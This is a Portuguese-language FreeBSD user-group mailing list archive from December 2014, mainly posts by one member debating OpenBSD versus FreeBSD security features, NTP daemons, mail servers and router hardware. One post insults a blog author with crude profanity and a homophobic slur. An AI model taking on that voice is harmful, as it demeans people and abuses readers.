> >> acontecer.
> >>>> []s e um bom natal a todos
> >>> Concordo, mas nem todos tem aptidão pra codar, então não adianta
> desejar
> >>> contribuição em forma de patch de quem não tem essa facilidade.Por
> outro
> >>> lado desde que entramos numa comunidade livre aprendemos que existem
> >> outras
> >>> formas de contribuir. E advocacy é uma delas. A defesa/advocacy que o
> >> Nunes
> >>> fez é um favor , uma visão que se opoe ao blog, e enriquece a
> discussão.
> >> Ja
> >>> os ataques pessoais do Alvarenga e seu incomodo/ataque ao português do
> >>> colega não gera qualquer valor positivo pra ninguém.
> >>> -
> >>> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>>
> >> -
> >> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD

[Evandro Nunes]

2014-12-26 16:47 GMT-02:00 firebits :

> IMHO
>
> Acho que seria legal, montar os ambientes em OpenBSD X FreeBSD ou FreeBSD
> X OpenBSD em PoCs, ativar as features que cada um citou nos emails,
> mostrando as defesas e os "bypass" de cada feature.
>
> Depois menciar situações da vida real (tipo falar do problema e não da
> pessoa) e como foi resolvido ou melhorado ou que foi mitigado.
>
> Ai publicar os Howtos de cada coisa e ver o que é melhorado, o que pode ser
> melhorado e o que não pode ser melhorado.
>
> Acho que isso ajuda a melhorar em algo.
>
> A idéia aqui, da minha parte não é ofender ninguém ou falar merda e também
> que alguém ou algo foi assim, só acho que seria melhor falarmos mais das
> coisas, do que das pessoas.
>
> Se falei ou falo algo errado ou merda, não me importo que me corrijam, até
> porque tenho muito que aprender e aprendo muito com as pessoas da lista,
> cada um com sua forma ou idéia.
>
> Novamente, é apenas IMHO.
>
> @firebitsbr
>

eu concordo, coloque linux e trusted solaris nesse paper tambem
concordo e dou um passo a frente em me candidatar pro hardening do freebsd,
linux
e também do openbsd pois são os 3 sistemas com que trabalho
acho que consigo que a afa, aqui em pirassununga, hospede as boxes
mas não consigo que a afa ceda as boxes, precisaria de alguém contribuir
nao acreio que seja adequado virtualizar também ja que as virtualizacoes
gerariam vulnerabilidades adicionais

mas no final o resultado, com freebsd e openbsd ao menos, acho q seria o
mesmo...
um sistema difícil de penetrar, mesmo com acesso local (ssh)
mais que uma equipe pra hardening, é importante ter uma equipe pra
explorar...
algo sob controle e com pessoas escolhidas a dedo pq ninguém quer um kids
collection da vida gerando DDoS
ja que o objetivo não seria esse e sim testar a resiliência dos sistemas e
não de sua conectividade


Em 26 de dezembro de 2014 13:14, ae moura 
> escreveu:
>
> > > From: rbga...@gmail.com
> > > Date: Thu, 25 Dec 2014 22:02:46 -0200
> > > To: freebsd@fug.com.br
> > > Subject: Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD
> > >
> > > > On Dec 25, 2014, at 15:17, Vitor Hugo 
> wrote:
> > > >
> > > > Alguém chamado Steve costumava sem bem temperamental e o final dele
> > não foi nada agradável.
> > >
> > > Nem to respondendo direto pra você Vitor, só peguei o seu email pra
> > responder na thread.
> > >
> > > Se algumas das pessoas aqui da FUG gastassem o mesmo tempo e energia
> que
> > gastam brigando por coisas tão banais pra produzir patches pro FreeBSD, a
> > comunidade inteira ficaria muito grata. Pena que isso nunca vai
> acontecer.
> > >
> > > []s e um bom natal a todos
> >
> > Concordo, mas nem todos tem aptidão pra codar, então não adianta desejar
> > contribuição em forma de patch de quem não tem essa facilidade.Por outro
> > lado desde que entramos numa comunidade livre aprendemos que existem
> outras
> > formas de contribuir. E advocacy é uma delas. A defesa/advocacy que o
> Nunes
> > fez é um favor , uma visão que se opoe ao blog, e enriquece a discussão.
> Ja
> > os ataques pessoais do Alvarenga e seu incomodo/ataque ao português do
> > colega não gera qualquer valor positivo pra ninguém.
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Uma história interessante - ntpd x ntimed

[Evandro Nunes]

2014-12-22 10:15 GMT-02:00 Paulo Olivier Cavalcanti :

> On 22/12/2014 09:15, Renato Botelho wrote:
>
>> Apenas corrigindo a URL pro index:
>>
>> http://phk.freebsd.dk/time/index.html
>>
>>  [...]
>>>
>>
>>
> Bom artigo, mas depois que mudei para o ntpd do OpenBSD (net/openntpd)
> nunca mais tive preocupações com estabilidade e segurança.


como muito do que é feito no openbsd, incluindo ospf, opensmtpd, o openntpd
é uma implementação minimalista e limitada
se você precisa do básico, é uma boa opção
mas se precisa de setups avançados, uma rede grande e integração, não
atende...
o phk sofreu com seus próprios servidores NTP tomando DDoS autentico por
parte da DLink
ele deve saber o que faz, e se fizer com a mesma competência que fez o
varnish estamos bem servidos

voce nao tem acl, voce não tem mecanismos básicos de controle de acesso e
autorização
e uma vez de pe e ouvindo em IP publico voce não tem sequer proteção contra
ataques de amplificação
é praticamente um daemon de sincronia mais que um daemon de serviço de time





>
>
> --
> http://about.me/paulocavalcanti
>
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD

[Evandro Nunes]

2014-12-22 21:29 GMT-02:00 ae moura :

> > Date: Mon, 22 Dec 2014 21:06:28 -0200
> > From: paulo.rd...@bsd.com.br
> > To: freebsd@fug.com.br
> > Subject: Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD
> >
> >
> > On 22/12/2014 19:28, Oscar Marques wrote:
> > > Parabéns Evandro.
> > >
> > > Tô rindo pra caralho.
> > > Será que vou ter que reescrever o email também?
> Pois é Oscar, acho que vai afinal se referiu ao seu orgão sexual de forma
> desnecessária e grosseira.
> Convehamos senhores, se a FUG caminhar por esse caminho eu saio fora dessa
> que sempre foi a melhor lista do Brasil.
> Acho que não tem nada a ver, o e-mail do Evandro pode ter sido pouco sutil
> e com algumas palavras menos elegantes mas não tem nada demais.Acho que
> todos aqui são adultos o bastante para respeitar a escolha sobre a forma
> como a pessoa quer se expressar. Não quebrou nenhuma regra relevante da FUG
> nem ofendeu ninguém.
> Ao contrário os dois e-mails dele, o e-mail da favela e a versão do gueto
> foram igualmente relevantes pro assunto e mais rico do que qualquer outro
> e-mail da thread.Já os 2 e-mails do rapaz que se ofendeu foram de tom
> pessoal, atacando o Evandro sem se dar ao trabalho de enriquecer a
> discussão. Nem mesmo no segundo tentou ridicularizar o cara. Acho isso
> convardia e não se faz.
> Conheco o Evandro de longa data.Já estudei com ele e sei que não é
> qualquer um.Evandro seu purga, já te falei pra parar com essas gírias do
> gueto!Eu não sei como você conseguiu passar no vestibular e estudar
> comigo.Que m***, digo que porcaria de vestibular você fez pra entrar na AFA
> e USP?Esse ensino público cada vez pior, como alguém como você passa num
> concurso como vestibular que preza a redacão? (risos)
> Estou brincando, pros que possam não ter compreendido.Esse cara em 2008
> passou na FUVEST, na AFA e na UFSCAR.Basta procurar Evandro Nunes
> "Gordofritz"[1] no Google que vão ver que não é qualquer um.
> É um dos melhores alunos da engenharia e da politecnica, um dos melhores
> da forca áerea.Acho que não merece ser tratado como um favelado ainda que
> use gírias do gueto.Mas o conteúdo do e-mail é relevante.
> Saudacões irmão.A AFA manda saudades.
> http://www.sistemapoliedro.com.br/noticias/2008/pdf/aprovacoes_14_02.pdf
> > Olha o respeito na lista por favor,>
> > Para esses fins por favor redirecionar o assunto para a lista
> > c...@fug.com.br
> Não acho que houve falta de respeito senão pelos ataques pessoais ao único
> que veio com argumentos técnicos na lista independente de como ele queira
> fazer referência aos restos fecais quando os cita.Além disso vamos deixar
> de hipcrisia.
> Os usuários de openbsd há anos, décadas, convivem com o Theo de Raadt que
> na lista solta "shit, bullshit, suck, balls, asshole, useless shit" e
> outras palavrinhas menos elegantes que as que o Evandro usou, só que fala
> pros pobres usuários ou quem quer que esteja na lista, enquanto o Evandro
> não ofendeu ninguém, apenas considerou uma porcaria o texto do blog não das
> pessoas nessa lista.
> Quer dizer do theo  de raadt os usuários openbsd aceitam comer sapo e
> ouvir indelicadezas e acham isso "normal"  é apenas o "jeito dele" e em bom
> portugues não pode?
> Shit é mais educado pq é ingles é isso então?
> Sério sem hipocrisia galera. Deixa o cara se comunicar como acha
> conveniente. Não passou do limite e não ofendeu ninguém. Ao contrário
> enriqueceu a discussão como nenhum outro na mesma thread.
> > flamers >> /dev/null
> Pois é saudades do Irado.Que do jeito pouco delicado dele sempre foi a voz
> da sensateza.Duvido que ele se ofenderia com tão pouco.
>


oscar marques? tu é o oscar, milico dos VANT no SERPRO, és tu mano? rss
ta cheio de militar nessa porr, digo nessa lista...

fala tenente moura, mano desencana obrigado por tentar me defender mas n
precisa não

deixa o cara ai de boa me atacando a vontade, não me importo
se fosse pra dar carteirada tava usando e-mail @afa.aer.mil.br  e tu tambem
mas prefiro que não passe pelo ironport.galeao.aer.mil.br HOHOHOHOHOHO

o que rola é o seguinte
eu acho o openbsd muito hype
e as porr (digo os queridos) usuários openbsd são hype também
tem um camarada na lista americana que fala do freebsd "push it, don't hype
it" e eu concordo
um sistema precisa de apoio, não de fans doidoes que defendem a ferro e
fogo qualquer besteira

eu pessoalmente descordo das besteiras do post do blog
e ja vi nego falando muita besteira por ai, inclusive autores de livro que
frequentam essa lista
e como nao, o proprio camarada que n curte um e-mail redigido dos mano dos
gueto que citou em palestras de pf que pf tinha N vezes mais performance
que ipfw no freebsd
quando na verdade

Re: [FUG-BR] vpopmail vs dovecot

[Evandro Nunes]

On Mon, Dec 22, 2014 at 8:41 PM, Vitor Hugo  wrote:

> O que é melhor? Vpopmail com Qmail ou Postfix + mysql com Dovecot?
>

olha
nao sao coisas mutuamente exclusivas

voce pode usar dovecot com vpopmail, com postfix
pode usar vpopmail com mysql, com pgsql, com ldap, com varios backend

entao sua pergunta se resume entre vpopmail ou postfix
o que tambem nao e muito adequado ja que o vpopmail e um manager de domains
e users pro qmail
entao sua pergunta e postfix vs qmail e ai pronto entrou em religiao e
opinioes pessoais

tente testar os dois vitor e ver qual te atende mais
se voce quer coisa simples e solucoes prontas va de postfix
se gosta de hackear, fazer coisas elegantes voce mesmo e gosta de unix em
sua natureza pura
va de qmail
se precisa de volume, muitas caixas e usuarios va de qmail+vpopmail

mas com ou sem mysql, tanto faz, tanto para vpop quanto postfix voce pode
usar qualquer um dos principais backends, q esta bem servido






> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD

[Evandro Nunes]

Prezado Eduardo Alvarenga conhecido e ofendido "OpenBSDzeiro",

Ei de resumir meu e-mail em linguagem não coloquial e em seu nível de
literatura, em estima ao intelecto vosso e dos demais:
Em minha humilde e impaciente opinião, o post desse blog trata apenas de
uma coletânea de informações tendenciosas e pouco justas, além de
incompletas e não razoáveis. Em especial no que tange a tabela comparativa
com excesso de cores.

A maior parte das tecnologias outrora citadas são implementadas em outros
sistemas como Windows 2000 em sua plenitude, e comprovadamente não torna
esses sistemas mais seguros. Em minha opinião prática de usuário também
OpenBSD, esses recursos tem como principais características no OpenBSD as
seguintes:

1) Tratam-se de recursos exclusivos e de eficiência duvidosa, que colocam o
OpenBSD em sua exclusividade tecnológica em pé de igualmente com...
Microsoft Windows.

2) Tratam-se de recursos que adicional sobrecarga desnecessária ao sistema
com benefícios de segurança não constantes, variando essencialmente nas
técnicas de ataques, e que poderiam ser mitigadas de forma mais genérica e
menos onerosa sob a ótica de processamento.

Some a isso o fato conhecido que o OpenBSD é um sistema essencialmente
monothread, um dos poucos sistemas que se propõe a serem usados em
ambientes críticos mas que não tem uma arquitetura moderna de
processamento, então a sobrecarga imposta por tal tecnologia torna-se um
recurso ainda mais oneroso visto que independente de quantas CPU você
tiver, estamos falando de recursos de kernel e que portanto não serão
executados em outro lugar que não na CPU0.
Ademais, a tendência do post nesse blog e sua imprecisão são notáveis em
especial pela ausência mais que relevante de tecnologias existentes no
FreeBSD mas não no OpenBSD, diferente do mac e jail citados, as diferenças
vão muito além, caso em que eu citei apenas as seguintes, sem esforço ou
trabalho de buscar outras:

> - jails
> > - bhyve
> > - mac
> > - acl
> > - capsicum
> > - casper
> > - openpam
> > - bsmaudit
> > - auditd, auditdistd
> > - kernel securelevel integrado com mac, capsicum, casper, acls
> > - p1e extended attributes
> > - zfs com um milhao de recursos de seguranca
> > - geom com geli, gbde, gshsec, etc
>

Por gentileza onde você lê "milhao" leia "milhão", s/seguranca/segurança/g
para que vosso pavor da linguagem coloquial não impeça ainda mais vssa
leitura. Sim tive que carregar um Xmodmap para redigir esse e-mail buscando
pontuações e acentos que sabemos, não são típicos ou imperativos na
comunicação por internet mas Vssa. Senhoria parece se incomodar. Tive
também que carregar o X e redigir o texto fora do console já para isso.


> > meia duzia de politica mac enfia essas merdas do openbsd debaixo do
> tapete
>

O que quis dizer em um texto que você ouviria num Manhattan Connection com
o Maynard, seria:

Nenhum desses recursos são de fato necessários em um sistema como FreeBSD
onde consegue-se com mandatory access control, um nível de isolamento das
aplicações de userland e fatias de processos de kernel tamanho, que geram
as mesmas proteções e com mais vantagens. Tais fatos já foram expostos na
Usenix pelo Senhor Doutor Robert Watson onde ele escala de qualquer
política Systrace (OpenBSD) ou dos LSM (Linux), ou dos controles do W^R
(além do que o NX bit oferece) de forma trivial e generalista, ou seja uma
receita única de bolo para colocar por água abaixo tais proteções
defendidas erroneamente como diferencial relevante nesse blog post
(leia-se, postagem de blogue).
Ainda notei minha opinião, mais uma vez de tom pessoal mas percepção
prática, que o post em questão cita o fato de ter um "pf mais atualizado"
como diferencial, e ter "pf" como algo "amarelo", tenciosamente não citando
que o pf no FreeBSD é multithread, apesar do texto mencionar, a tabela
comparativa ignora, e não citando que no FreeBSD existem 3 opções de
firewall, não apenas o PF, o que geraria numa tabela comparativa simplista
como essa mais vantagens para o FreeBSD. Somei a isso o fato do PF estar no
kernel GENERIC do OpenBSD, e não no FreeBSD, citado como vantagem no post,
mas que na prática sob a ótica de performance é desvantagem sobretudo tendo
em vista a natureza monothread do kernel do sistema operacional
supracitado.

Isso sem contar que a proposta de GENERIC nos sistemas comparados é
totalmente divergente. Um se propondo a suportar o maior número possível de
periféricos físicos (leia-se hardware) e outro se propondo a suportar tudo,
incluindo recursos de kernel que nem sempre são usados, onerando "by
default" em processamento um sistema já limitado dada sua arquitetura.
Citei que a ausência que poderia sim ser notada no FreeBSD é de ASLR que
apesar de na prática, ser uma ausência irrelevante para um sistema que
oferece mac, capsicum, casper e outros recursos de segurança, ela se faz
relevante ainda assim, haja vista que MAC e afins ainda que disponíveis no
kernel GENERIC, precisam ser configurados e explicitamente implementado

Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD

[Evandro Nunes]

2014-12-18 10:37 GMT-02:00 Welkson Renny de Medeiros :

> Estava vendo o twitter ontem e me deparei com esse post:
>
> http://networkfilter.blogspot.com.br/2014/12/security-openbsd-vs-freebsd.html?m=1
>
> No Reddit tem alguns comentários:
> http://www.reddit.com/r/netsec/comments/2ph03s/security_openbsd_vs_freebsd/
>
> Ainda estou lendo o post... mas vejo com bons olhos esses "comparativos",
> pois nos mostra onde estamos errando (se é que estamos, pois muitas das
> tecnologias apresentadas são "novidades" pra mim =).
>
> flames > /dev/null
>

mano na boa
nunca li tanta porcaria junto
só desinformação

ASLR é a única coisa minimamente significativa que no FreeBSD ainda falta
alias faltava, ja esta no current jaja chega nas massas

o resto é um monte de merda que o openbsd tem
que só serve pra duas coisas:
1) falar que tem e os outros não, mesmo ninguem querendo
2) fazer o sistema virar uma carroça de tão pesado

outra coisa esse comparativo é mais tendencioso que a revista veja
onde ja se viu apontar jail e mac como único recurso que o openbsd não tem
eu sem nenhuma pesquisa cito:

- jails
- bhyve
- mac
- acl
- capsicum
- casper
- openpam
- bsmaudit
- auditd, auditdistd
- kernel securelevel integrado com mac, capsicum, casper, acls
- p1e extended attributes
- zfs com um milhao de recursos de seguranca
- geom com geli, gbde, gshsec, etc

meia duzia de politica mac enfia essas merdas do openbsd debaixo do tapete

e outra olha o diferencial

pf, latest, enabled by default

onde isso é vantagem?
num sistema monothread (openbsd)
ter o firewall no kernel GENERIC é só pra foder mais a performance
que já é uma merda rsss

esse povo sabe ser ridiculo

porque nao tem:

pf multithread
ipfw
ipfilter
pq seriam 3 vermelhinhos pro openbsd e verdes pro freebsd?

tendencioso pouco é besteira...

krl mano agora que vi "libressl" verde e "from ports" amarelho HAHAHA
queriam oq? a porra nem ta pronta...
me impressiona não colocarem opensmtpd vs sendmail KK

na boa nem sei pq perdi meu tempo lendo

quem é o autor desse blog? alguém?
ou um borra-botas qualquer?

deve ser developer openbsd ou fanboy
coisa de gente mordida
coisa de veado traído pelo macho

microsoft windows 2000 tem TODOS esses recursos
isso o torna tão seguro quanto openbsd?
mais q freebsd e mais q linux? rss rs

pnc desses merdas e seus argumentos alienados



>
> --
> Welkson
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] MIPS64 500MHZ no FreeBSD e Pfsense 2.2

[Evandro Nunes]

On Thu, Dec 4, 2014 at 11:28 AM, Luiz Otavio O Souza 
wrote:

> On 4 December 2014 at 11:03, Gustavo Freitas wrote:
> >>>realmente, na hora q fizer isso rodar no beaglebone,
> >>> basta uma googlada por uma placa com 2 nic..
> >
> > onde vc viu uma placa com 2 nic. ?
>
> Pode ser com 5 ? :-)
>
>
> http://www.bananapi.com/index.php/component/content/article?layout=edit&id=59
>
>
esse bpi vai rodar no freebsd?
alguem ja rodou?






> Luiz
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] BSD Magazine - PPPoE Concentrator Dual Stack!

[Evandro Nunes]

2014-12-03 18:37 GMT-02:00 Renato Frederick :

>
>
> Evandro Nunes escreveu:
>
>> renato o que voce chama de grandes pps? e que função você se refere?
>> firewall, ids, router?
>> cada vez mais eu vejo gente vindo para arquitetura mais parecida com PC e
>> deixando pouas funções com asics ou processadores específicos
>> veja por exemplo a palo alto metendo gpu e asics numa base de hardware
>> convencional
>> veja juniper metendo um cavium numa arquitetura até mais fraca que opções
>> da Intel no mercado mas colocando um processador trio pras finalidades
>> específicas
>>
>
> Evandro, roteador de borda.
> Vide algumas conversas que sempre rolam na gter quando alguém precisa de
> fazer um bgp multihomed com alguns links de por ex, 200, 300mb e começa a
> conversa de usar x, y ou z.



renato
não entendi
desculpe mas 200, 300mb não é nada
isso da o que? 50kpps, 60kpps
eu tenho 3Gbit/s com picos de 4Gbit/s roteados, dando 800kpps sobrando 1/3
de cpu ainda
acho que com mais cpu vai bem alem disso





>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] BSD Magazine - PPPoE Concentrator Dual Stack!

[Evandro Nunes]

ola luiz

2014-12-04 12:35 GMT-02:00 Luiz Otavio O Souza :

> 2014-12-03 16:59 GMT-02:00 Evandro Nunes:
> > 2014-12-03 15:12 GMT-02:00 Otavio Augusto:
> >
> [...]
> > por isso insisto, cade freebsd pra mips? pra arm está bem legal... cade
> > freebsd pra tilera?
>
> http://svnweb.freebsd.org/base/head/sys/mips/ :-)
>
> Embora o MIPS funcione bem no free com o suporte que veio da Juniper
> (bem estável por sinal), não há desenvolvedores ativos suficientes
> para manter o suporte a todo tipo de hardware disponível, pois no MIPS
> não existe padrão como no x86, cada placa, placa fabricante podem ser
> sistemas completamente diferentes, não existe BIOS ou outro sistema de
> enumeração dos dispositivos e recursos da placa, cada placa precisa de
> suporte especifico (drivers, mapeamento de recursos no kernel, ...).
>

entendi
pois é, será que não vale o mercado um esforço direcionado a uma ou 2
boards?
como essa rb por exemplo


>
> Que hardware que roda com tilera ? Só mikrotik ?
>

as cloudcore são tilera
as maipu e maipu power tambem sao tilera

linux roda mal em tilera
mas o routeros roda bem nas ccr ao menos
ou seja esse esforço é da mikrotik sem duvidas
a herança do linux é pouca e instavel


> O freebsd tem pouquíssimos desenvolvedores que portam e mantém essas
> arquiteturas, sem um aporte de alguma parte interessada infelizmente
> não rola.
>
> Os desenvolvedores preferem trabalhar com arquiteturas bem suportadas
> como o novo arm64/ARMv8 (que deve ser produzido em massa pela HP e
> Cavium entre outros).
>

eu também acho arm mais negócio
porém mips é mais baixo custo


>
>
> http://www.prnewswire.com/news-releases/cavium-to-sponsor-freebsd-armv8-based-implementation-277724361.html
>
> Até agora poucos sortudos tiveram acesso ao hardware real baseado
> nessa plataforma (nenhum desenvolvedor do FreeBSD teve acesso ao
> hardware até o momento), mas todos que tentaram já viram o FreeBSD
> bootando no hardware real (até onde é possível, ainda se trata de WIP)
> baseado no trabalho que esta sendo feito com o emulador fornecido pela
> ARM.
>
> E isso foi trabalho de 1 desenvolvedor:
> http://svnweb.freebsd.org/base/projects/arm64/
>
> O arm64 tem ACPI e UEFI e vai se parecer bastante com o x86, por isso
> todo mundo esta de olho.
>
> Agora o FreeBSD/ARM tem até suporte a guest XEN (que esta sendo
> integrado com o pessoal da citrix).
>
> ARM caminha para se tornar uma arquitetura tier 1 no FreeBSD (mesmo
> com o baixo número de desenvolvedores ativos).
>

está mesmo muito bem avançado
já trocamos ideias em outras listas sobre arm e os trabalhos que voce, o
rui paulo estão fazendo e claro todos os demais que estao trabalhando no
arm há mais tempo tem gerado bons resultados
sinto so falta de um bom suporte SATA nas truck2/truck3
o restante pra mim é tier-1 rss


>
> >
> > ou seja o freebsd tem que seguir evoluindo nessas archs
> >
> > os commiters da lista devem saber se esses 2 milhões que a foundation ja
> > arrecadou esse ano, o quanto desse esforço está destinado a financiar
> > melhorias em mips e arm por exemplo
>
> A fundação trabalha em várias frentes, apoiando desenvolvimentos
> específicos, se aproximando dos fabricantes, conseguindo documentação
> para os desenvolvedores e também fomentando a comunidade (com os
> eventos por exemplo) para atrair mais gente e consequentemente mais
> desenvolvedores.
>
> Luiz
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] BSD Magazine - PPPoE Concentrator Dual Stack!

[Evandro Nunes]

2014-12-03 15:12 GMT-02:00 Otavio Augusto :

> Em 3 de dezembro de 2014 14:59, Renato Frederick
>  escreveu:
> >
> >
> >> Jean Milanez Melo 
> >> 3 de dezembro de 2014 14:11
> >> Evandro,
> >>
> >> Bem parecido com o consumo da L-100. Em nossos testes ficou na média em
> >> 32W, chegando no máximo de 40W.
> >>
> >> abs
> >>
> >>
> >> --
> >> Atenciosamente
> >> Jean Milanez Melo
> >> FreeBSD Brasil LTDA
> >> Fone: (31) 3516-0800
> >> http://www.freebsdbrasil.com.br 
> >>
> >>
> >>
> >> -
> >> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
> >
> > Blz Jean? E a questão do server-u para grandes pps? Sempre que vem a
> > discussão filosófica "usar juniper/cisco/blablabla X PC" volta o pessoal
> a
> > falar que chega o ponto que a arquitetura do PC abre as pernas,
> indiferente
> > se está rodando bsd, linux, MikroBUG, etc...
> >
> > Não estou querendo fazer comparação entre o server-u X BSD e um cisco asr
> > 9000 por exemplo, hehehe. Vamos jogar prá baixo, por exemplo, um
> 3945e[1],
> > que o preço gira entre uns 20mil reais no mercado de usados, valor este
> que
> > se for comparar com o datasheet do server-u 800, por 4490 reais, é bem
> > atrativo.
> >
> > [1]
> >
> https://supportforums.cisco.com/sites/default/files/legacy/0/5/3/78350-white_paper_c11_595485.pdf
> >
> >
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>

>
O que falta para popularizar não é o serverU mas sim um hardware de
> baixo custo que pode ser colocado em cima de torres, algo equivalente
> a uma RB433AH, se tiver um hardware destes ai sim os provedores
> comecariam usar.
> pq no lugar do serverU quem quer usar FreeBSD pode montar um PC x86
> como entrada até poder comprar um servidor decente como o
> serverU.
> Muitos precisam de pequenos roteadores para atender a demanda das
> redes distruibuidas e o MK por enquanto é o que atende melhor a
> necessidade de custo beneficio. Se não fosse o BugOS os Mikrotiks
> seriam a solucao perfeita para muita gente.
> Eu comecei a criar uma interface de administracao like Winbox para
> freebsd mas parei por causa do hardware de baixo custo que não
> encontra, as soekris e alix da vida ou são caras ou tem baixo poder de
> processamento.
> E o suporte do FreeBSD a RB433AH ou outras RBs equivalentes não está 100%.
>

renato o que voce chama de grandes pps? e que função você se refere?
firewall, ids, router?
cada vez mais eu vejo gente vindo para arquitetura mais parecida com PC e
deixando pouas funções com asics ou processadores específicos
veja por exemplo a palo alto metendo gpu e asics numa base de hardware
convencional
veja juniper metendo um cavium numa arquitetura até mais fraca que opções
da Intel no mercado mas colocando um processador trio pras finalidades
específicas

otavio seu ponto faz sentido para pops e outras coisas que não é o que o
serveru se propõe
não tem qualquer sentido apontar que um pc faz a mesma coisa, você me
indica um pc com 6 portas intel e 4 em bypass? ou com 6 portas igb e todas
as 6 em bypass? por menos de 3 mil reais?

agora para pop concordo que o que a RB433AH faz é bem específico
você não tem muitos concorrentes pra isso ainda mais nesse preço
nem sei se teria um concorrente fácil porque esse preço vem do volume
principalmente

nesse sentido não acho que falta um hardware pra concorrer com a rb pq não
precisa concorrer, o mercado gosta da caixa
o que precisa ai volto ao ponto que alguns ja indicaram é o pfSense e o
proprio FreeBSD continuarem amadurecendo e rodar em mais plataformas
MIPS-BE e ARM

ou seja um pfSense ou FreeBSD nessa mesma RB somado a um how-to de
concentrador pppoe como esse do Tiago na BSDMagazine e um esforço pra
padronizar isso, creio eu que resolva

agora percebo também que esse é um esforço tupiniquim
o mercado brasileiro gera retorno que justifique o pfSense fazer isso para
nós?

pq só tem nós
somos o maior emergente que consome pops com 802.11 e consegue ver
utilidade em uma board com 3 mini-pci pra enfiar um cartão atheros e
conduzir o negócio de internet

os resto do mercado relevante (leia-se eua e europa) provavelmente olha pro
pfSense com outros olhos, e não como alguém pra WISP

ou seja se vale o esforço só o pessoal do pfSense pra avaliar

mas acho que o caminho mais natural é o freebsd evoluir pra rodar bem
nessas arquiteturas
e não a arquitetura se adaptar ao freebsd rss

você compra a CPU Atheros que equipa essas routerboard por peso
por isso é possível ter um hardware tão barato

a mikrotik investe em mips, arm, e agora tilera
dão os pulos deles pra fazer o linux rodar e o routerOS rodar
cheio de bugs? com certeza, mas "é o que tem pra hoje"

por isso insisto, cade freebsd pra mips? pra arm está bem legal... cade
freebsd pra tilera?

ou seja o freebsd

Re: [FUG-BR] BSD Magazine - PPPoE Concentrator Dual Stack!

[Evandro Nunes]

2014-12-03 14:11 GMT-02:00 Jean Milanez Melo :

> Evandro,
>
> Bem parecido com o consumo da L-100. Em nossos testes ficou na média em
> 32W, chegando no máximo de 40W.
>
> abs
>

em 48v e em 220 o consumo é o mesmo, 40W?
isso é consumo de netbook
é muito baixo! já é bom na L100, na L800 com 8 CPU achei que fosse maior


>
> > Em 03/12/2014, à(s) 13:38, Evandro Nunes 
> escreveu:
> >
> > 2014-12-03 13:27 GMT-02:00 Jean Milanez Melo  >:
> >
> >> Olá Gilson,
> >>
> >> A fonte 48V são para ambos os produtos: L-100 e L-800.
> >>
> >
> > jean
> > na l800 qual consumo com 48v?
> >
> > as l100 não gastam nada, meu nobreak dura o triplo do tempo
> >
> >
> >>
> >>> Em 03/12/2014, à(s) 11:43, Paiva, Gilson de 
> >> escreveu:
> >>>
> >>> 2014-12-03 11:09 GMT-02:00 Paulo Henrique - BSDs Brasil <
> >>> paulo.rd...@bsd.com.br>:
> >>>
> >>>>
> >>>>
> >>>> Enviado do meu smartphone Sony Xperia™
> >>>>
> >>>>  Jean Milanez Melo escreveu 
> >>>>
> >>>>> Pessoal, bom dia.
> >>>>>
> >>>>> Ficamos felizes com as recomendações de vocês do ServerU. Trabalhamos
> >>>> duro para produzir um hardware que atendesse as nossas exigências e da
> >>>> comunidade. Uma novidade que ainda não divulgamos mas que pode ser do
> >>>> interesse de muitos aqui é que agora ao comprar o ServerU você pode
> >> optar
